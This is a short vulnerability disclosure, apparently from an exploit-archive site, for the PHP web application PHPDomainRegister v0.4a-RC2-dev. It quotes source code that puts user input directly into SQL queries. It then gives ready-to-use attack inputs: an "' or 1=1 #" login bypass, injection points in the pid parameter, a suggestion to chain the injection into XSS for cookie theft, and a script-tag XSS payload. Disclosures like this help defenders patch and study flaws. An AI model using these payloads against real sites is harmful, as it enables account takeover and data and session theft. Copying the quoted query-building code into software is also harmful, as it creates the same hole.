Title = PHPDomainRegister v0.4a-RC2-dev => [SQL Auth][SQL Inject][XSS]
Author = Or4nG.M4n
Download = http://garr.dl.sourceforge.net/project/phpdr/v0.4b%20-%20RC2.rar
This Bug Powered By : GooGLe
Thnks :
+----------------------------------+
| xSs m4n i-Hmx Cyber-Crystal |
| Dr.Bnned ahwak2000 sa^Dev!L |
+----------------------------------+
SQL Auth Bypass
vuln : class_AjaxLogin.php line 73
function is_login() { <<<<==== 1
include ('../config.php'); <<<<==== 2
if(isset($_POST['username'])) { <<<<==== 3
$_SESSION['username'] = $_POST['username']; <<<<==== 4
$password = $_POST['password']; <<<<==== 5
$strSQL = <<<<==== 6
"SELECT
*
FROM
`".$_SQL_PREFIX . $USER_Table_Name."`
WHERE
`LOGIN_NAME` = '".$_SESSION['username']."'
AND
password = md5('".$password."');"; <<<<==== 7
$result = mysql_query ($strSQL); <<<<==== 8
$row = mysql_fetch_row($result); <<<<==== 9
$exist = count($row); <<<<==== 10
if($exist >=2) { $this->jscript_location(); } <<<<==== 11
[jscript_location]
function jscript_location() { <<<<==== 12
$this->set_session(); <<<<==== 13
echo "<script> $('#container').fadeOut();window.location.href='".SUCCESS_LOGIN_GOTO."'</script>"; <<<<==== 14
How i can Exploit this bug :
just login as = > admin ' or 1=1 #
SQL injection
vuln
admin/index.php line 212
$sql = "SELECT name, price, disc, disc2, webspace FROM ".$_SQL_PREFIX."packages WHERE `id` = ".$_GET['pid'].";"; <<<<==== 1
$getpack = mysql_query($sql); <<<<==== 2
line 1079
showPacket($pid); <<<<==== 3
vuln
index.php line 617
$SQL = "SELECT * FROM ".$_SQL_PREFIX."packages where id = ".$_GET['pid'].""; <<<<==== 1
$result = mysql_query($SQL); <<<<==== 2
Exploit Here :
index.php?usetype=domainauswahl&pid=%injectionhere%&use=Details
admin/index.php?show=showPacket&pid=%injectionhere% Sql to xss to get cookie
Cross Site Scrpting [xss]
admin/index.php?show=domains&do=delFirmadomains&domain=<script>alert(7);</script>
